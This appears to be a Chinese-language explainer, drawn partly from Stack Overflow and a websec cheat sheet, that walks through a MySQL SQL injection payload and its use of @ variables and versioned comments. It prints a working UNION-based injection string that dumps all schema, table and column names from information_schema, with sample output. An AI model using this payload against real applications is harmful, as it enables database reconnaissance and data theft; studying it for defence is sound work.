(@) 和 (@:=0x00) 在此有效负载中代表什么?
@ - 是变量名@:=0x00 - 将零赋值给这个变量。
注意::=是赋值运算符
感谢@Frank Cedeno 和@strnk 在评论中的问答。
@Frank Cedeno - 如何 / !12345sELecT / 成为选择?
@strnk - 这是对 SQL 注释的 MySQL 特定扩展,sELecT仅当服务器版本大于或等于 12345 (1.23.45) 时才会包含在查询中,因此它会过滤掉非 MySQL 服务器
更多信息:
从websec sql_injection:
一次检索多个表/列
SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x
例子:
SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x), 4--+';
输出:
[ information_schema ] >CHARACTER_SETS > CHARACTER_SET_NAME
[ information_schema ] >CHARACTER_SETS > DEFAULT_COLLATE_NAME
[ information_schema ] >CHARACTER_SETS > DESCRIPTION
[ information_schema ] >CHARACTER_SETS > MAXLEN
[ information_schema ] >COLLATIONS > COLLATION_NAME
[ information_schema ] >COLLATIONS > CHARACTER_SET_NAME
[ information_schema ] >COLLATIONS > ID
[ information_schema ] >COLLATIONS > IS_DEFAULT
[ information_schema ] >COLLATIONS > IS_COMPILED
这个 Stackoverflow 答案解释了 SQL 代码:
首先,我会通过重新格式化来使查询更具可读性:
1) SELECT (SELECT (@)
2) FROM (SELECT (@:=0x00),
3) (SELECT (@)
4) FROM (information_schema.columns)
5) WHERE (table_schema >= @)
6) AND (@) IN (@:=CONCAT(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))
7) )
8) )
9) a);
@的赋值如下:
- 在第 3 行,它得到值 0x00(十进制:0)
- 在第 5 行中,该值用于大于 (table_schema >= 0)
- 第 6 行是将每个模式、表和列名连接到 @
- @ 在第 1 行返回并包含您的结构的串联列表
在第 6 行中,向变量添加了一个额外的<br>(0x3C,0x62,0x72,0x3E),以使输出更具可读性